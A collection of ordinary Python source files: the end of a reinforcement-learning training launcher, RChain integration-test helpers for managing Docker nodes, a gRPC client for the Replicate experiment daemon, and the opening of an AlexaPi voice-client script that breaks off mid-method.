parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true') parser.add_argument('--nn_baseline', '-bl', action='store_true') parser.add_argument('--seed', type=int, default=1) parser.add_argument('--n_experiments', '-e', type=int, default=1) parser.add_argument('--n_layers', '-l', type=int, default=2) parser.add_argument('--size', '-s', type=int, default=64) args = parser.parse_args() if not(os.path.exists('data')): os.makedirs('data') logdir = args.exp_name + '_' + args.env_name if not args.no_time: logdir = logdir + '_' + time.strftime("%d-%m-%Y_%H-%M-%S") logdir = os.path.join('data', logdir) if not(os.path.exists(logdir)): os.makedirs(logdir) max_path_length = args.ep_len if args.ep_len > 0 else None processes = [] for e in range(args.n_experiments): seed = args.seed + 10*e print('Running experiment with seed %d'%seed) def train_func(): train_PG( exp_name=args.exp_name, env_name=args.env_name, n_iter=args.n_iter, gamma=args.discount, min_timesteps_per_batch=args.batch_size, max_path_length=max_path_length, learning_rate=args.learning_rate, reward_to_go=args.reward_to_go, animate=args.render, logdir=os.path.join(logdir,'%d'%seed), normalize_advantages=not(args.dont_normalize_advantages), nn_baseline=args.nn_baseline, seed=seed, n_layers=args.n_layers, size=args.size ) # # Awkward hacky process runs, because Tensorflow does not like # # repeatedly calling train_PG in the same thread. p = Process(target=train_func, args=tuple()) p.start() processes.append(p) # if you comment in the line below, then the loop will block # until this process finishes # p.join() for p in processes: p.join() if __name__ == "__main__": main()
rnode.py
import functools import re import os import queue import shlex import string import time import shutil import logging from logging import (Logger) import threading from threading import Event import contextlib from multiprocessing import Queue, Process from typing import ( Dict, List, Tuple, Optional, Generator, AbstractSet, Set ) from dataclasses import dataclass import requests from rchain.client import RClient, RClientException from rchain.pb.DeployServiceCommon_pb2 import LightBlockInfo, BlockInfo from rchain.crypto import PrivateKey from rchain.certificate import get_node_id_raw from rchain.const import DEFAULT_PHLO_LIMIT, DEFAULT_PHLO_PRICE from cryptography.hazmat.primitives.serialization import load_pem_private_key from cryptography.hazmat.backends import default_backend from docker.client import DockerClient from docker.models.containers import Container from docker.models.containers import ExecResult from .common import ( make_tempdir, make_tempfile, TestingContext, NonZeroExitCodeError, GetBlockError, ParsingError, SynchronyConstraintError, NotAnActiveValidatorError, ValidatorNotContainsLatestMes ) from .wait import ( wait_for_node_started, wait_for_approved_block_received_handler_state, ) from .error import( RNodeAddressNotFoundError, CommandTimeoutError, ) from .utils import ( parse_mvdag_str, ISLINUX, get_free_tcp_port ) DEFAULT_IMAGE = os.environ.get("DEFAULT_IMAGE", "rchain-integration-tests:latest") _PB_REPEATED_STR_SEP = "#$" rnode_binary = '/opt/docker/bin/rnode' rnode_directory = "/var/lib/rnode" rnode_deploy_dir = "{}/deploy".format(rnode_directory) rnode_bonds_file = '{}/genesis/bonds.txt'.format(rnode_directory) rnode_wallets_file = '{}/genesis/wallets.txt'.format(rnode_directory) rnode_certificate_path = '{}/node.certificate.pem'.format(rnode_directory) rnode_key_path = '{}/node.key.pem'.format(rnode_directory) rnode_logback_file = '{}/logback.xml'.format(rnode_directory) rnode_default_launcher_args = [ # We don't want the launcher script (generated by sbt-native-packager) to # swallow first java error and exit with confusing "No java installation was # detected" message. '-no-version-check', ] rnode_default_client_options = [ # Make client calls on internal port which expose all APIs '--grpc-port=40402', ] default_http_port = 40403 default_internal_grpc_port = 40402 default_external_grpc_port = 40401 default_shard_id = 'test' @dataclass class PortMapping: http: int external_grpc: int internal_grpc: int class Node: def __init__(self, *, container: Container, deploy_dir: str, command_timeout: int, network: str, ports: Optional[PortMapping]) -> None: self.container = container self.local_deploy_dir = deploy_dir self.remote_deploy_dir = rnode_deploy_dir self.name = container.name self.command_timeout = command_timeout self.network = network self.terminate_background_logging_event = threading.Event() self.background_logging = LoggingThread( container=container, logger=logging.getLogger('peers'), terminate_thread_event=self.terminate_background_logging_event, ) self.background_logging.setDaemon(True) self.background_logging.start() self.ports = ports def __repr__(self) -> str: return '<Node(name={})>'.format(repr(self.name)) def get_node_pem_cert(self) -> bytes: return self.shell_out("cat", rnode_certificate_path).encode('utf8') def get_node_pem_key(self) -> bytes: return self.shell_out("cat", rnode_key_path).encode('utf8') def view_file(self, path: str) -> str: return self.shell_out("cat", path) def get_node_id_raw(self) -> bytes: key = load_pem_private_key(self.get_node_pem_key(), None, default_backend()) return get_node_id_raw(key) def logs(self) -> str: return self.container.logs().decode('utf-8') def get_rnode_address(self) -> str: log_content = self.logs() regex = "Listening for traffic on (rnode://.+@{name}\\?protocol=\\d+&discovery=\\d+)\\.$"\ .format(name=self.container.name) match = re.search(regex, log_content, re.MULTILINE | re.DOTALL) if match is None: raise RNodeAddressNotFoundError(regex) address = match.group(1) return address def get_metrics(self) -> str: resp = requests.get("http://{}:{}/metrics".format(self.get_self_host(), self.get_http_port())) return resp.content.decode('utf8') def get_connected_peers_metric_value(self) -> str: try: resp = requests.get("http://{}:{}/metrics".format(self.get_self_host(), self.get_http_port())) result = '' for line in resp.content.decode('utf8').splitlines(): if line.startswith("rchain_comm_rp_connect_peers"): result = line break return result except NonZeroExitCodeError as e: if e.exit_code == 1: return '' raise def get_peer_node_ip(self, network_name: str) -> str: self.container.reload() network_config = self.container.attrs['NetworkSettings']['Networks'][network_name] assert network_config is not None return network_config['IPAddress'] def get_self_host(self) -> str: if ISLINUX: return self.get_peer_node_ip(self.network) return 'localhost' def get_http_port(self) -> int: if ISLINUX: return default_http_port assert self.ports return self.ports.http def get_external_grpc_port(self) -> int: if ISLINUX: return default_external_grpc_port assert self.ports return self.ports.external_grpc def get_internal_grpc_port(self) -> int: if ISLINUX: return default_internal_grpc_port assert self.ports return self.ports.internal_grpc def cleanup(self) -> None: self.container.remove(force=True, v=True) self.terminate_background_logging_event.set() self.background_logging.join() def get_blocks_count(self, depth: int) -> int: show_blocks = self.get_blocks(depth) return len(show_blocks) def get_blocks(self, depth: int) -> List[LightBlockInfo]: with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: return client.show_blocks(depth) def get_block(self, hash: str) -> BlockInfo: with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: try: return client.show_block(hash) except RClientException as e: message = e.args[0] raise GetBlockError(('show-block',), 1, message) from e # Too low level -- do not use directly. Prefer shell_out() instead. def _exec_run_with_timeout(self, cmd: Tuple[str, ...], stderr: bool = True) -> Tuple[int, str]: control_queue: queue.Queue = Queue(1) def command_process() -> None: exec_result: ExecResult = self.container.exec_run(cmd, stderr=stderr) control_queue.put((exec_result.exit_code, exec_result.output.decode('utf-8'))) process = Process(target=command_process) logging.info("COMMAND {} {}".format(self.name, cmd)) process.start() try: exit_code, output = control_queue.get(True, self.command_timeout) except queue.Empty as e: raise CommandTimeoutError(cmd, self.command_timeout) from e finally: process.terminate() if exit_code != 0: for line in output.splitlines(): logging.info('{}: {}'.format(self.name, line)) logging.warning("EXITED {} {} {}".format(self.name, cmd, exit_code)) else: for line in output.splitlines(): logging.debug('{}: {}'.format(self.name, line)) logging.debug("EXITED {} {} {}".format(self.name, cmd, exit_code)) return exit_code, output def shell_out(self, *cmd: str, stderr: bool = True) -> str: exit_code, output = self._exec_run_with_timeout(cmd, stderr=stderr) if exit_code != 0: raise NonZeroExitCodeError(command=cmd, exit_code=exit_code, output=output) return output def rnode_command(self, *node_args: str, stderr: bool = True) -> str: return self.shell_out(rnode_binary, *rnode_default_client_options, *rnode_default_launcher_args, *node_args, stderr=stderr) def eval(self, rho_file_path: str) -> str: return self.rnode_command('eval', rho_file_path) def deploy(self, rho_file_path: str, private_key: PrivateKey, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE, valid_after_block_no:int=0, shard_id: str = default_shard_id) -> str: try: now_time = int(time.time()*1000) with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: return client.deploy(private_key, self.view_file(rho_file_path), phlo_price, phlo_limit, valid_after_block_no, now_time, shard_id=shard_id) except RClientException as e: message = e.args[0] if "Parsing error" in message: raise ParsingError(command=("propose", ), exit_code=1, output=message) from e # TODO out of phlogiston error raise e def get_vdag(self) -> str: return self.rnode_command('vdag', stderr=False) def get_mvdag(self) -> str: return self.rnode_command('mvdag', stderr=False) def get_parsed_mvdag(self) -> Dict[str, Set[str]]: return parse_mvdag_str(self.get_mvdag()) def deploy_string(self, rholang_code: str, private_key: PrivateKey, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE, valid_after_block_no:int = 0) -> str: try: now_time = int(time.time()*1000) with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: return client.deploy(private_key, rholang_code, phlo_price, phlo_limit, valid_after_block_no, now_time) except RClientException as e: message = e.args[0] if "Parsing error" in message: raise ParsingError(command=("propose", ), exit_code=1, output=message) from e # TODO out of phlogiston error raise e def find_deploy(self, deploy_id: str) -> LightBlockInfo: with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: return client.find_deploy(deploy_id) def propose(self) -> str: try: with RClient(self.get_self_host(), self.get_internal_grpc_port()) as client: return client.propose() except RClientException as e: message = e.args[0] if "Must wait for more blocks from other validators" in message: raise SynchronyConstraintError(command=('propose',), exit_code=1, output=message) from e if "ReadOnlyMode" in message: raise NotAnActiveValidatorError(command=('propose',), exit_code=1, output=message) from e if "Validator does not have a latest message" in message: raise ValidatorNotContainsLatestMes(command=('propose',), exit_code=1, output=message) from e raise e def last_finalized_block(self) -> BlockInfo: with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: return client.last_finalized_block() def repl(self, rholang_code: str, stderr: bool = False) -> str: quoted_rholang_code = shlex.quote(rholang_code) output = self.shell_out( 'sh', '-c', 'echo {quoted_rholang_code} | {rnode_binary} {rnode_default_client_options} repl' .format(quoted_rholang_code=quoted_rholang_code,rnode_binary=rnode_binary, rnode_default_client_options=" ".join(rnode_default_client_options)), stderr=stderr, ) return output def cat_forward_file(self, public_key: str) -> str: return self.shell_out('cat', '/opt/docker/forward_{}.rho'.format(public_key)) def cat_bond_file(self, public_key: str) -> str: return self.shell_out('cat', '/opt/docker/bond_{}.rho'.format(public_key)) __timestamp_rx = "\\d\\d:\\d\\d:\\d\\d\\.\\d\\d\\d" __log_message_rx = re.compile("^{timestamp_rx} (.*?)(?={timestamp_rx})" .format(timestamp_rx=__timestamp_rx), re.MULTILINE | re.DOTALL) def log_lines(self) -> List[str]: log_content = self.logs() return Node.__log_message_rx.split(log_content) def deploy_contract_with_substitution(self, substitute_dict: Dict[str, str], rho_file_path: str, private_key: PrivateKey, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE, shard_id: str = default_shard_id) -> str: """ Supposed that you have a contract with content like below. new x in { x!("#DATA") } If you pass a dict {'#DATA': "123456"} as substitute_dict args in this func, this method would substitute the string #DATA in the contract with 123456, which turns out to be new x in { x!("123456") } And then deploy the contract in the node """ shutil.copyfile(rho_file_path, os.path.join(self.local_deploy_dir, os.path.basename(rho_file_path))) container_contract_file_path = os.path.join(self.remote_deploy_dir, os.path.basename(rho_file_path)) substitute_rules = ';'.join([r's/{}/{}/g'.format(key.replace(r'/', r'\/'), value.replace(r'/', r'\/')) for key, value in substitute_dict.items()]) self.shell_out( 'sed', '-i', '-e', substitute_rules, container_contract_file_path, ) self.deploy(container_contract_file_path, private_key, phlo_limit, phlo_price, shard_id=shard_id) block_hash = self.propose() return block_hash class LoggingThread(threading.Thread): def __init__(self, terminate_thread_event: Event, container: Container, logger: Logger) -> None: super().__init__() self.terminate_thread_event = terminate_thread_event self.container = container self.logger = logger def run(self) -> None: containers_log_lines_generator = self.container.logs(stream=True, follow=True) try: while True: if self.terminate_thread_event.is_set(): break line = next(containers_log_lines_generator) self.logger.info('{:>11}: {}'.format(self.container.name[-11:], line.decode('utf-8').rstrip())) except StopIteration: pass class DeployThread(threading.Thread): def __init__(self, name: str, node: Node, contract: str, count: int, private_key: PrivateKey) -> None: threading.Thread.__init__(self) self.name = name self.node = node self.contract = contract self.count = count self.private_key = private_key def run(self) -> None: for _ in range(self.count): self.node.deploy(self.contract, self.private_key) self.node.propose() def make_container_command(container_command: str, container_command_flags: AbstractSet, container_command_options: Dict) -> str: opts = ['{}={}'.format(option, argument) for option, argument in container_command_options.items()] flags = ' '.join(container_command_flags) result = '{} {} {}'.format(container_command, flags, ' '.join(opts)) return result def make_node( # pylint: disable=too-many-locals *, docker_client: DockerClient, name: str, network: str, bonds_file: str, container_command: str, container_command_flags: AbstractSet, container_command_options: Dict, command_timeout: int, extra_volumes: Optional[List[str]], allowed_peers: Optional[List[str]], image: str = DEFAULT_IMAGE, mem_limit: Optional[str] = None, wallets_file: Optional[str] = None, ) -> Node: assert isinstance(name, str) assert '_' not in name, 'Underscore is not allowed in host name' deploy_dir = make_tempdir("rchain-integration-test") hosts_allow_file_content = \ "ALL:ALL" if allowed_peers is None else "\n".join("ALL: {}".format(peer) for peer in allowed_peers) hosts_allow_file = make_tempfile("hosts-allow-{}".format(name), hosts_allow_file_content) hosts_deny_file = make_tempfile("hosts-deny-{}".format(name), "ALL: ALL") container_command_options["-Dlogback.configurationFile"] = rnode_logback_file command = make_container_command(container_command, container_command_flags, container_command_options) env = {} java_options = os.environ.get('_JAVA_OPTIONS') if java_options is not None: env['_JAVA_OPTIONS'] = java_options logging.debug('Using _JAVA_OPTIONS: {}'.format(java_options)) volumes = [ "{}:/etc/hosts.allow".format(hosts_allow_file), "{}:/etc/hosts.deny".format(hosts_deny_file), "{}:{}".format(bonds_file, rnode_bonds_file), "{}:{}".format(deploy_dir, rnode_deploy_dir), "{}:{}".format(os.path.abspath("resources/logback.xml"), rnode_logback_file) ] if wallets_file is not None: volumes.append('{}:{}'.format(wallets_file, rnode_wallets_file)) if extra_volumes: all_volumes = volumes + extra_volumes else: all_volumes = volumes if ISLINUX: ports = None port_map = None else: port_map = PortMapping(http=get_free_tcp_port(), external_grpc=get_free_tcp_port(), internal_grpc=get_free_tcp_port()) ports = {default_http_port: port_map.http, default_external_grpc_port: port_map.external_grpc, default_internal_grpc_port: port_map.internal_grpc} logging.info('STARTING %s %s', name, command) container = docker_client.containers.run( image, name=name, user='root', detach=True, mem_limit=mem_limit, network=network, volumes=all_volumes, command=command, hostname=name, environment=env, ports=ports ) node = Node( container=container, deploy_dir=deploy_dir, command_timeout=command_timeout, network=network, ports=port_map ) return node def make_bootstrap_node( *, docker_client: DockerClient, network: str, bonds_file: str, private_key: PrivateKey, command_timeout: int, allowed_peers: Optional[List[str]] = None, mem_limit: Optional[str] = None, cli_flags: Optional[AbstractSet] = None, cli_options: Optional[Dict] = None, wallets_file: Optional[str] = None, extra_volumes: Optional[List[str]] = None, synchrony_constraint_threshold: float = 0.0, max_peer_queue_size: int = 10, give_up_after_skipped: int = 0, drop_peer_after_retries: int = 0, number_of_active_validators: int = 10, epoch_length: int = 10000, quarantine_length: int = 50000, min_phlo_price: int = 1, shard_id: str = default_shard_id ) -> Node: container_name = make_bootstrap_name(network) container_command_flags = set([ *rnode_default_launcher_args, "--standalone", "--prometheus", "--no-upnp", "--allow-private-addresses" ]) container_command_options = { "--protocol-port": 40400, "--validator-private-key": private_key.to_hex(), "--validator-public-key": private_key.get_public_key().to_hex(), "--host": container_name, "--synchrony-constraint-threshold": synchrony_constraint_threshold, "--frrd-max-peer-queue-size": max_peer_queue_size, "--frrd-give-up-after-skipped": give_up_after_skipped, "--frrd-drop-peer-after-retries": drop_peer_after_retries, "--number-of-active-validators": number_of_active_validators, "--epoch-length": epoch_length, "--quarantine-length": quarantine_length, "--min-phlo-price": min_phlo_price, "--shard-name": shard_id } if cli_flags is not None: container_command_flags.update(cli_flags) if cli_options is not None: container_command_options.update(cli_options) container = make_node( docker_client=docker_client, name=container_name, network=network, bonds_file=bonds_file, container_command='run', container_command_flags=container_command_flags, container_command_options=container_command_options, command_timeout=command_timeout, extra_volumes=extra_volumes, allowed_peers=allowed_peers, mem_limit=mem_limit if mem_limit is not None else '4G', wallets_file=wallets_file, ) return container def make_container_name(network_name: str, name: str) -> str: return "{network_name}.{name}".format(network_name=network_name, name=name) def make_bootstrap_name(network_name: str) -> str: return make_container_name(network_name=network_name, name='bootstrap') def make_peer_name(network_name: str, name: str) -> str: if name.isdigit(): actual_name = 'peer{}'.format(name) else: actual_name = name return make_container_name(network_name=network_name, name=actual_name) def make_peer( *, docker_client: DockerClient, network: str, name: str, bonds_file: str, command_timeout: int, bootstrap: Node, private_key: PrivateKey, allowed_peers: Optional[List[str]] = None, mem_limit: Optional[str] = None, wallets_file: Optional[str] = None, cli_flags: Optional[AbstractSet] = None, cli_options: Optional[Dict] = None, extra_volumes: Optional[List[str]] = None, synchrony_constraint_threshold: float = 0.0, max_peer_queue_size: int = 10, give_up_after_skipped: int = 0, drop_peer_after_retries: int = 0, number_of_active_validators: int = 10, epoch_length: int = 10000, quarantine_length: int = 50000, shard_id: str = default_shard_id ) -> Node: assert isinstance(name, str) assert '_' not in name, 'Underscore is not allowed in host name' name = make_peer_name(network, name) bootstrap_address = bootstrap.get_rnode_address() container_command_flags = set([ "--prometheus", "--no-upnp", "--allow-private-addresses" ]) if cli_flags is not None: container_command_flags.update(cli_flags) container_command_options = { "--bootstrap": bootstrap_address, "--validator-private-key": private_key.to_hex(), "--validator-public-key": private_key.get_public_key().to_hex(), "--host": name, "--synchrony-constraint-threshold": synchrony_constraint_threshold, "--frrd-max-peer-queue-size": max_peer_queue_size, "--frrd-give-up-after-skipped": give_up_after_skipped, "--frrd-drop-peer-after-retries": drop_peer_after_retries, "--number-of-active-validators": number_of_active_validators, "--epoch-length": epoch_length, "--quarantine-length": quarantine_length, "--shard-name": shard_id } if cli_options is not None: container_command_options.update(cli_options) container = make_node( docker_client=docker_client, name=name, network=network, bonds_file=bonds_file, container_command='run', container_command_flags=container_command_flags, container_command_options=container_command_options, command_timeout=command_timeout, extra_volumes=extra_volumes, allowed_peers=allowed_peers, mem_limit=mem_limit if not None else '4G', wallets_file=wallets_file, ) return container @contextlib.contextmanager def started_peer( *, context: TestingContext, network: str, name: str, bootstrap: Node, private_key: PrivateKey, cli_flags: Optional[AbstractSet] = None, cli_options: Optional[Dict] = None, extra_volumes: Optional[List[str]] = None, synchrony_constraint_threshold: float = 0.0, epoch_length: int = 10000, quarantine_length: int = 50000, shard_id: str = default_shard_id ) -> Generator[Node, None, None]: peer = make_peer( docker_client=context.docker, network=network, name=name, bonds_file=context.bonds_file, bootstrap=bootstrap, private_key=private_key, command_timeout=context.command_timeout, wallets_file=context.wallets_file, cli_flags=cli_flags, cli_options=cli_options, extra_volumes=extra_volumes, synchrony_constraint_threshold=synchrony_constraint_threshold, epoch_length=epoch_length, quarantine_length=quarantine_length, shard_id=shard_id ) try: wait_for_node_started(context, peer) yield peer finally: peer.cleanup() @contextlib.contextmanager def bootstrap_connected_peer( *, context: TestingContext, bootstrap: Node, name: str, private_key: PrivateKey, cli_options: Optional[Dict[str, str]] = None, synchrony_constraint_threshold: float = 0.0, epoch_length: int = 10000, quarantine_length: int = 50000, shard_id: str = default_shard_id ) -> Generator[Node, None, None]: with started_peer( context=context, network=bootstrap.network, name=name, bootstrap=bootstrap, private_key=private_key, cli_options=cli_options, synchrony_constraint_threshold=synchrony_constraint_threshold, epoch_length=epoch_length, quarantine_length=quarantine_length, shard_id=shard_id ) as peer: wait_for_approved_block_received_handler_state(context, peer) yield peer def make_random_network_name(context: TestingContext, length: int) -> str: return ''.join(context.random_generator.choice(string.ascii_lowercase) for m in range(length)) @contextlib.contextmanager def docker_network(context: TestingContext, docker_client: DockerClient) -> Generator[str, None, None]: network_name = "rchain-{}".format(make_random_network_name(context, 5)) docker_client.networks.create(network_name, driver="bridge") try: yield network_name finally: for network in docker_client.networks.list(): if network_name == network.name: network.remove() @contextlib.contextmanager def started_bootstrap( *, context: TestingContext, network: str, cli_flags: Optional[AbstractSet] = None, cli_options: Optional[Dict[str, str]] = None, extra_volumes: Optional[List[str]] = None, synchrony_constraint_threshold: float = 0.0, epoch_length: int = 10000, quarantine_length: int = 50000, min_phlo_price: int = 1, shard_id: str = default_shard_id ) -> Generator[Node, None, None]: bootstrap_node = make_bootstrap_node( docker_client=context.docker, network=network, bonds_file=context.bonds_file, private_key=context.bootstrap_key, command_timeout=context.command_timeout, cli_flags=cli_flags, cli_options=cli_options, wallets_file=context.wallets_file, extra_volumes=extra_volumes, synchrony_constraint_threshold=synchrony_constraint_threshold, epoch_length=epoch_length, quarantine_length=quarantine_length, min_phlo_price=min_phlo_price, shard_id=shard_id ) try: wait_for_node_started(context, bootstrap_node) yield bootstrap_node finally: bootstrap_node.cleanup() @contextlib.contextmanager def started_bootstrap_with_network( context: TestingContext, cli_flags: Optional[AbstractSet] = None, cli_options: Optional[Dict] = None, synchrony_constraint_threshold: float = 0.0, epoch_length: int = 10000, quarantine_length: int = 50000, min_phlo_price: int = 1, shard_id: str = default_shard_id, extra_volumes: Optional[List[str]] = None, wait_for_approved_block: bool = False, ) -> Generator[Node, None, None]: with docker_network(context, context.docker) as network: with started_bootstrap( context=context, network=network, cli_flags=cli_flags, cli_options=cli_options, synchrony_constraint_threshold=synchrony_constraint_threshold, extra_volumes=extra_volumes, epoch_length=epoch_length, quarantine_length=quarantine_length, min_phlo_price=min_phlo_price, shard_id=shard_id ) as bootstrap: if wait_for_approved_block: wait_for_approved_block_received_handler_state(context, bootstrap) yield bootstrap ready_bootstrap_with_network = functools.partial(started_bootstrap_with_network, wait_for_approved_block=True)
daemon.py
# TODO: docstring # TODO: rename to shared? import functools import tempfile import os from typing import Optional, Dict, Any, List import subprocess import atexit import sys import threading import grpc # type: ignore from google.rpc import status_pb2, error_details_pb2 # type: ignore from .servicepb.replicate_pb2_grpc import DaemonStub from .servicepb import replicate_pb2 as pb from . import pb_convert from .experiment import Experiment from .checkpoint import Checkpoint, PrimaryMetric from . import exceptions from . import console # TODO(andreas): rename to replicate-daemon DAEMON_BINARY = os.path.join(os.path.dirname(__file__), "bin/replicate-shared") def handle_error(f): @functools.wraps(f) def wrapped(*args, **kwargs): try: return f(*args, **kwargs) except grpc.RpcError as e: code, name = e.code().value details = e.details() if name == "internal": status_code = get_status_code(e, details) if status_code: raise handle_exception(status_code, details) raise Exception(details) return wrapped def handle_exception(code, details): if code == "DOES_NOT_EXIST": return exceptions.DoesNotExist(details) if code == "READ_ERROR": return exceptions.ReadError(details) if code == "WRITE_ERROR": return exceptions.WriteError(details) if code == "REPOSITORY_CONFIGURATION_ERROR": return exceptions.RepositoryConfigurationError(details) if code == "INCOMPATIBLE_REPOSITORY_VERSION": return exceptions.IncompatibleRepositoryVersion(details) if code == "CORRUPTED_REPOSITORY_SPEC": return exceptions.CorruptedRepositorySpec(details) if code == "CONFIG_NOT_FOUND": return exceptions.ConfigNotFound(details) def get_status_code(e, details): metadata = e.trailing_metadata() status_md = [x for x in metadata if is_status_detail(x)] if status_md: for md in status_md: st = status_pb2.Status() st.MergeFromString(md.value) if st.details: val = error_details_pb2.ErrorInfo() st.details[0].Unpack(val) return val.reason return None def is_status_detail(x): return hasattr(x, "key") and x.key == "grpc-status-details-bin" class Daemon: def __init__(self, project, socket_path=None, debug=False): self.project = project if socket_path is None: # create a new temporary file just to get a free name. # the Go GRPC server will create the file. f = tempfile.NamedTemporaryFile( prefix="replicate-daemon-", suffix=".sock", delete=False ) self.socket_path = f.name f.close() else: self.socket_path = socket_path # the Go GRPC server will fail to start if the socket file # already exists. os.unlink(self.socket_path) cmd = [DAEMON_BINARY] if self.project.repository: cmd += ["-R", self.project.repository] if self.project.directory: cmd += ["-D", self.project.directory] if debug: cmd += ["-v"] cmd.append(self.socket_path) self.process = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE ) # need to wrap stdout and stderr for this to work in jupyter # notebooks. jupyter redefines sys.std{out,err} as custom # writers that eventually write the output to the notebook. self.stdout_thread = start_wrapped_pipe(self.process.stdout, sys.stdout) self.stderr_thread = start_wrapped_pipe(self.process.stderr, sys.stderr) atexit.register(self.cleanup) self.channel = grpc.insecure_channel("unix://" + self.socket_path) self.stub = DaemonStub(self.channel) TIMEOUT_SEC = 15 grpc.channel_ready_future(self.channel).result(timeout=TIMEOUT_SEC) # TODO(andreas): catch daemon dying (bubble up an exception so we can fail on experiment.init()) def cleanup(self): if self.process.poll() is None: # check if process is still running: # the sigterm handler in the daemon process waits for any in-progress uploads etc. to finish. # the sigterm handler also deletes the socket file self.process.terminate() self.process.wait() # need to join these threads to avoid "could not acquire lock" error self.stdout_thread.join() self.stderr_thread.join() self.channel.close() @handle_error def create_experiment( self, path: Optional[str], params: Optional[Dict[str, Any]], command: Optional[str], python_packages: Dict[str, str], python_version: str, quiet: bool, disable_hearbeat: bool, ) -> Experiment: pb_experiment = pb.Experiment( params=pb_convert.value_map_to_pb(params), path=path, command=command, pythonPackages=python_packages, pythonVersion=python_version, ) ret = self.stub.CreateExperiment( pb.CreateExperimentRequest( experiment=pb_experiment, disableHeartbeat=disable_hearbeat, quiet=quiet, ), ) return pb_convert.experiment_from_pb(self.project, ret.experiment) @handle_error def create_checkpoint( self, experiment: Experiment, path: Optional[str], step: Optional[int], metrics: Optional[Dict[str, Any]], primary_metric: Optional[PrimaryMetric], quiet: bool, ) -> Checkpoint: pb_primary_metric = pb_convert.primary_metric_to_pb(primary_metric) pb_checkpoint = pb.Checkpoint( metrics=pb_convert.value_map_to_pb(metrics), path=path, primaryMetric=pb_primary_metric, step=step, ) ret = self.stub.CreateCheckpoint( pb.CreateCheckpointRequest(checkpoint=pb_checkpoint, quiet=quiet) ) return pb_convert.checkpoint_from_pb(experiment, ret.checkpoint) @handle_error def save_experiment( self, experiment: Experiment, quiet: bool, ): pb_experiment = pb_convert.experiment_to_pb(experiment) return self.stub.SaveExperiment( pb.SaveExperimentRequest(experiment=pb_experiment, quiet=quiet) ) @handle_error def stop_experiment(self, experiment_id: str): self.stub.StopExperiment(pb.StopExperimentRequest(experimentID=experiment_id)) @handle_error def get_experiment(self, experiment_id_prefix: str) -> Experiment: ret = self.stub.GetExperiment( pb.GetExperimentRequest(experimentIDPrefix=experiment_id_prefix), ) return pb_convert.experiment_from_pb(self.project, ret.experiment) @handle_error def list_experiments(self) -> List[Experiment]: ret = self.stub.ListExperiments(pb.ListExperimentsRequest()) return pb_convert.experiments_from_pb(self.project, ret.experiments) @handle_error def delete_experiment(self, experiment_id: str): self.stub.DeleteExperiment( pb.DeleteExperimentRequest(experimentID=experiment_id) ) @handle_error def checkout_checkpoint( self, checkpoint_id_prefix: str, output_directory: str, quiet: bool ): self.stub.CheckoutCheckpoint( pb.CheckoutCheckpointRequest( checkpointIDPrefix=checkpoint_id_prefix, outputDirectory=output_directory, quiet=quiet, ), ) @handle_error def experiment_is_running(self, experiment_id: str) -> str: ret = self.stub.GetExperimentStatus( pb.GetExperimentStatusRequest(experimentID=experiment_id) ) return ret.status == pb.GetExperimentStatusReply.Status.RUNNING def start_wrapped_pipe(pipe, writer): def wrap_pipe(pipe, writer): with pipe: for line in iter(pipe.readline, b""): writer.write(line) writer.flush() # if writer is normal sys.std{out,err}, it can't # write bytes directly. # see https://stackoverflow.com/a/908440/135797 if hasattr(writer, "buffer"): writer = writer.buffer thread = threading.Thread(target=wrap_pipe, args=[pipe, writer], daemon=True) thread.start() return thread
main.py
#! /usr/bin/env python import importlib import os import logging import tempfile import signal import shutil import time import sys import threading import json import optparse import email import subprocess from future.builtins import bytes import yaml import requests import coloredlogs import alexapi.config import alexapi.tunein as tunein import alexapi.capture import alexapi.triggers as triggers from alexapi.exceptions import ConfigurationException from alexapi.constants import RequestType, PlayerActivity logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s') coloredlogs.DEFAULT_FIELD_STYLES = { 'hostname': {'color': 'magenta'}, 'programname': {'color': 'cyan'}, 'name': {'color': 'blue'}, 'levelname': {'color': 'magenta', 'bold': True}, 'asctime': {'color': 'green'} } coloredlogs.DEFAULT_LEVEL_STYLES = { 'info': {'color': 'blue'}, 'critical': {'color': 'red', 'bold': True}, 'error': {'color': 'red'}, 'debug': {'color': 'green'}, 'warning': {'color': 'yellow'} } # Get arguments parser = optparse.OptionParser() parser.add_option('-s', '--silent', dest="silent", action="store_true", default=False, help="start without saying hello") parser.add_option('-d', '--debug', dest="debug", action="store_true", default=False, help="display debug messages") parser.add_option('--daemon', dest="daemon", action="store_true", default=False, help="Used by initd/systemd start script to reconfigure logging") cmdopts, cmdargs = parser.parse_args() silent = cmdopts.silent debug = cmdopts.debug config_exists = alexapi.config.filename is not None if config_exists: with open(alexapi.config.filename, 'r') as stream: config = yaml.load(stream) if debug: log_level = logging.DEBUG else: if config_exists: log_level = logging.getLevelName(config.get('logging', 'INFO').upper()) else: log_level = logging.getLevelName('INFO') if cmdopts.daemon: coloredlogs.DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s' else: coloredlogs.DEFAULT_LOG_FORMAT = '%(asctime)s %(levelname)s: %(message)s' coloredlogs.install(level=log_level) alexa_logger = logging.getLogger('alexapi') alexa_logger.setLevel(log_level) logger = logging.getLogger(__name__) if not config_exists: logger.critical('Can not find configuration file. Exiting...') sys.exit(1) # Setup event commands event_commands = { 'startup': "", 'pre_interaction': "", 'post_interaction': "", 'shutdown': "", } if 'event_commands' in config: event_commands.update(config['event_commands']) im = importlib.import_module('alexapi.device_platforms.' + config['platform']['device'] + 'platform', package=None) cl = getattr(im, config['platform']['device'].capitalize() + 'Platform') platform = cl(config) class Player(object): config = None platform = None pHandler = None tunein_parser = None navigation_token = None playlist_last_item = None progressReportRequired = [] def __init__(self, config, platform, pHandler): # pylint: disable=redefined-outer-name self.config = config self.platform = platform self.pHandler = pHandler # pylint: disable=invalid-name self.tunein_parser = tunein.TuneIn(5000) def play_playlist(self, payload): self.navigation_token = payload['navigationToken'] 